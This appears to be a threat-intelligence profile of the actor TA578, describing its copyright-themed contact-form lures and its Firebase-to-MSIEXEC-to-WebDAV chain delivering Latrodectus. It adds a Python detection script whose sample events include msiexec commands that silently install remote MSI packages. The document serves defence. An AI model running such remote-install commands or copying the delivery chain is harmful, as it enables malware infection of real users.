TA578
TA578 is a financially motivated threat actor tracked by Proofpoint since May 2020. It is associated with email- and web-based initial access activity and has delivered multiple malware families over time, including Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Bumblebee, Cobalt Strike, and more recently Latrodectus. Proofpoint reported TA578 delivering IcedID since June 2020 and noted recurring use of "stolen images" / copyright-violation themes. The actor has also been described in reporting as associated with botnet-based operations involving SSLoad and Bumblebee malware.

TA578 commonly uses social-engineering lures and delivery chains centered on malicious links and scripts. Reported tradecraft includes abuse of website contact forms to initiate conversations with targets, often impersonating companies and sending legal threats about alleged copyright infringement. TA578 has placed malicious links in contact forms on victim sites to redirect users to malware downloads.

In observed campaigns, victims were redirected to personalized landing pages that downloaded JavaScript from Google Firebase; the JavaScript then invoked MSIEXEC to run an MSI from a WebDAV share, which executed a bundled DLL to launch Latrodectus. TA578 has also used JavaScript files in malware execution chains and has hosted malicious scripts on Google Firebase.

Since mid-January 2024, Latrodectus has been almost exclusively distributed by TA578 in observed campaigns. Proofpoint observed TA578 delivering Latrodectus via a DanaBot infection in December 2023, and later via contact-form and copyright-themed lures in February 2024. Reporting describes TA578 as one of the initial access brokers associated with Latrodectus campaigns. No additional aliases or sub-groups for TA578 are reported in the sources summarized here.
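As an added detection example (not code from Proofpoint, Mallory, or any cited report): the chain above ends with MSIEXEC installing an MSI from a WebDAV share, which a defender can flag in process-creation telemetry by looking for msiexec.exe whose package argument is a UNC path or URL. The record layout and sample command lines are constructed; treating wscript.exe, cscript.exe, and mshta.exe as the "script host" parents that raise severity is an assumption, since the reporting says only that JavaScript invoked MSIEXEC.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon-style process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"msiexec.exe /i \\203.0.113.10@SSL\DavWWWRoot\share\update.msi /q"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"msiexec.exe /qn /i http://example.invalid/pkg.msi"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c dir \\fileserver\share"},
]

# An MSI package sourced from a URL or a UNC/WebDAV path (\\host@SSL\DavWWWRoot\...).
REMOTE_MSI = re.compile(r"(?i)(?:https?://\S+\.msi|\\\\\S+\.msi)")
# Assumed script hosts that would run the downloaded JavaScript.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")

@dataclass
class Finding:
    cmdline: str
    severity: str
    reason: str

def analyze(events):
    """Return a Finding for each msiexec launch that installs from a remote source."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("msiexec.exe"):
            continue
        m = REMOTE_MSI.search(ev["cmdline"])
        if not m:
            continue  # local package path: benign in this model
        parent = ev["parent"].lower().rsplit("\\", 1)[-1]
        if parent in SCRIPT_HOSTS:
            sev, why = "high", f"remote MSI {m.group(0)} spawned by script host {parent}"
        else:
            sev, why = "medium", f"remote MSI {m.group(0)} spawned by {parent}"
        findings.append(Finding(ev["cmdline"], sev, why))
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.severity.upper(), f.reason)
```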
Tradecraft
19 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Associated malware families
8 malware families attributed to this actor across reporting.
3 additional families tracked in Mallory.
Observables
79 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
16 sources tracked across advisories, community write-ups, and news.
Listed as a threat actor associated with the MMC/GrimResource detection analytic.
Listed in annotations as a threat actor associated with the detection context; no specific activity beyond inclusion in the analytic metadata is described.
Listed as a threat actor associated with malicious link execution and spearphishing attachment activity relevant to ISO/LNK delivery detection.
Uses Latrodectus in phishing campaigns.